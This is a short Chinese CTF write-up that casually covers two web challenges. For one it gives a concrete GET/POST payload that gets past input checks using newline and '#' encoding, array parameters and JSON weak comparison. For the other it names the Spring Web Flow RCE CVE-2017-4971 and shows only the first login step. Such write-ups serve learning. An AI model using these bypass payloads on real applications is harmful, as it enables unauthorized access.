Web狗的我今天上午满课,下午两节课,抽时间做了两个web,u1s1,两个web都是原题,pwn👴刚开始pwn本地全部打通了,然后远程死活不通,最后跑路永劫无间了。哈哈哈哈
WEB
MIDDLE_MAGIC
%0a绕过第一关最后加%23是#
数组绕过第二关
json 弱类型比较
payload
GET
aaa=%0apass_the_level_1%23
POST
admin[]=1&root_pwd[]=2&level_3={"result":0}
SPRING
题目为CVE-2017-4971-Spring Web Flow远程代码执行漏洞
进入登录页面以后随便填一个给出的账号登录